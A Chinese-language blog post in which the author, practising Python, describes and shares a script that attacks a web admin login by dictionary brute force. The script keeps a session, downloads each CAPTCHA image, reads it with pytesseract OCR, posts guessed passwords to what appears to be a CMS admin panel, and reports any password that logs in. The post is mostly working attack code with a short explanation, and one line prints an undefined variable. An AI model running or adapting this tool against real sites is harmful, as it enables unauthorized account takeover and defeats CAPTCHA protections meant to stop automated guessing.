尝试练习python,苦于没有什么想写……
百度得知,pytesseract库识别验证码还可以,尝试利用
结果:
识别验证码效果不理想,获取十张验证码能够准确识别一张的概率,加上自己对验证码的处理效果会稍微提高些
环境:
Tesseract OCR engine
安装PIL
pytesseract
第一步:
获取当前验证码,这里懵了下,照片的url地址是一个php文件,不知道如何下载图片,后来百度并尝试得知,保持session的情况下直接访问php文件返回的html就是当前需要提交的图片,直接保存 resp.content 为 .jpg 格式就可以
第二步:
了解如何识别验证码
from PIL import Image
import pytesseract
image = Image.open('v1.jpg')
print pytesseract.image_to_string(image)
第三步:
思考整个流程,一步一步的思考,并且尽量把功能细化成各个函数,保持代码整洁性和可读性,我觉得可读就行 ……
requests 库有保持session的便用方法,附加乱码处理一种方式
s = requests.session()
resp = s.post(url, data=..., header=...)
resp.encoding = resp.apparent_encoding
附上代码,如果有更好的处理方式,不吝赐教
#coding:utf-8
import requests
import time
import Image
import pytesseract
from optparse import OptionParser
def cmdParse():
parser = OptionParser()
parser.add_option("-f",dest="dicPath",default=False,help="dict file path")
parser.add_option("-u",dest="user",default=False,help="user name")
parser.add_option("--url",dest="url",default=False,help="The data post url. Like www.baidu.com")
(option, args) = parser.parse_args()
return option.dicPath, option.url, option.user
def Analysis():
image = Image.open("/root/img.jpg")
return pytesseract.image_to_string(image)
def Payload(user,pwd,vaCode):
return {"userid":user ,"pwd":pwd ,"gotopage":"xxx",
"dopost":"xxx" ,"adminstyle":"xxx" ,"validate":vaCode}
def header():
return {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0'}
def imgSave(s,url):
urlCode = url + "/include/xxx.php"
resp = s.get(urlCode)
f = open("/root/img.jpg","wb")
f.write(resp.content)
f.close()
def main():
i = 1
xing = "*"
truePwd = "......"
dicPath, url, user = cmdParse()
urlLogin = url + "/xxx/login.php"
s = requests.session()
for pwd in open(dicPath):
imgSave(s,url)
vaCode = Analysis()
resp = s.post(urlLogin,data=Payload(user,pwd,vaCode),headers=header())
resp.encoding = resp.apparent_encoding
print resp.text
print x,xing*40
if u"成功登录,正在转向管理管理主页!" in resp.text:
truePwd = pwd
print "testing ........"
if i % 5 == 0:
time.sleep(1)
i = i + 1
if truePwd != "......":
print truePwd
if __name__ == '__main__':
main()